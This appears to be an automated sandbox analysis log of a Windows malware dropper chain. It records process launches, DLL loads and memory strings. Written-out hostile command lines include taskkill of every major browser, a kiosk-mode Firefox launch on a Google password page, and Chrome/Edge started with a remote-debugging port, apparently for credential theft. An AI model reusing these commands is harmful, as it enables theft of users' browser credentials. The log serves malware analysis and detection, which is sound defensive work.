Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 79ddad050f.exe, 00000008.00000003.3008778869.0000000005911000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2979910679.0000000005909000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2980244884.00000000058EA000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000003.3208770610.0000000005994000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3184861343.000000000594E000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136988862.0000000005954000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3138678199.0000000005935000.00000004.00000800.00020000.00000000.sdmp, JJKFBAKFBGDHIEBGDAKF.9.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: e051bdf457.exe, 00000009.00000002.3297911095.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe Virustotal: Detection: 58%
Source: 4611cc433b.exe String found in binary or memory: /add?substr=
Source: 4611cc433b.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 79ddad050f.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: e051bdf457.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe "C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe "C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe "C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe "C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe "C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe"
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2108,i,15494402203579294748,10477359376935723563,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2188 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa193a77-707b-4b1f-8078-06a41e567f56} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" 1c22c36ef10 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe "C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe "C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -parentBuildID 20230927232528 -prefsHandle 2532 -prefMapHandle 4108 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5bfb161-09aa-43d5-9f3c-cfcc713c6169} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" 1c23ea0f510 rdd
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2748 --field-trial-handle=2264,i,14280928009878877682,9304379882023563075,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=2028,i,13930945499186658156,9224765416305937446,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe "C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe "C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe "C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe "C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe "C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2108,i,15494402203579294748,10477359376935723563,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2188 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa193a77-707b-4b1f-8078-06a41e567f56} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" 1c22c36ef10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -parentBuildID 20230927232528 -prefsHandle 2532 -prefMapHandle 4108 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5bfb161-09aa-43d5-9f3c-cfcc713c6169} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" 1c23ea0f510 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2748 --field-trial-handle=2264,i,14280928009878877682,9304379882023563075,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=2028,i,13930945499186658156,9224765416305937446,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ncryptsslp.dll Jump to behavior
